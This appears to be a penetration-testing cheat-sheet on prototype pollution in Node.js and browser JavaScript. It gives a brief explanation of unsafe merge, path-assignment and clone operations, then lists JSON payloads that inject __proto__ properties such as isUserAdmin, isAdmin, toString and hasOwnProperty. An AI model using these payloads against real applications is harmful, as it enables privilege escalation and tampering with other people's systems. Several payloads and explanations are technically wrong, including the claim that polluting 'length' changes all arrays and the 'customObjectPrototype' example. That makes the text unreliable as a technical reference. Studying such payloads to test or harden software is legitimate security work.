Prototype Pollution

Can also affect client-side JavaScript applications

Affects Node.js

Prototype pollution happens at some unsafe merge, clone, extend and path assignment operations on malicious JSON objects.

• This is exploitable only if any of the following three happens:

  • Object recursive merge

  • Property definition by path

  • Object clone

• Some of the most popular libraries being affected are lodash and Hoek

• Templates are a good target for prototype pollution.

Payloads

• The most straightforward example of prototype pollution involves injecting the __proto__ property, which affects all objects that inherit from Object.prototype.

This example adds the isUserAdmin property to the prototype chain:

{
  "__proto__": {
    "isUserAdmin": true
  }
}

Also, you can directly manipulate the Object.prototype by modifying the __proto__ property. This could be done in objects passed to vulnerable code:

{
  "__proto__": {
    "toString": "malicious code"
  }
}

If the application allows you to define properties via paths (e.g., obj.a.b):

{
  "a.b.__proto__.isHacked": true
}

The constructor property is part of the prototype chain for JavaScript objects:

{
  "__proto__.constructor": "MaliciousFunction"
}

The hasOwnProperty method is often used to check if an object has a property, but it can be overridden in the prototype:

{
  "__proto__.hasOwnProperty": false
}

If an attacker can manipulate built-in objects' prototypes (like Array.prototype or Function.prototype), they could affect the behavior of all instances of those types:

{
  "__proto__.length": 1000
}

If the application uses a templating engine and allows user input to be rendered without sanitization, an attacker might inject a prototype pollution payload directly via the template:

{
  "__proto__": {
    "isAdmin": true
  }
}

You can directly inject properties into the prototype of custom classes or objects:

{
  "customObjectPrototype.isHacked": true
}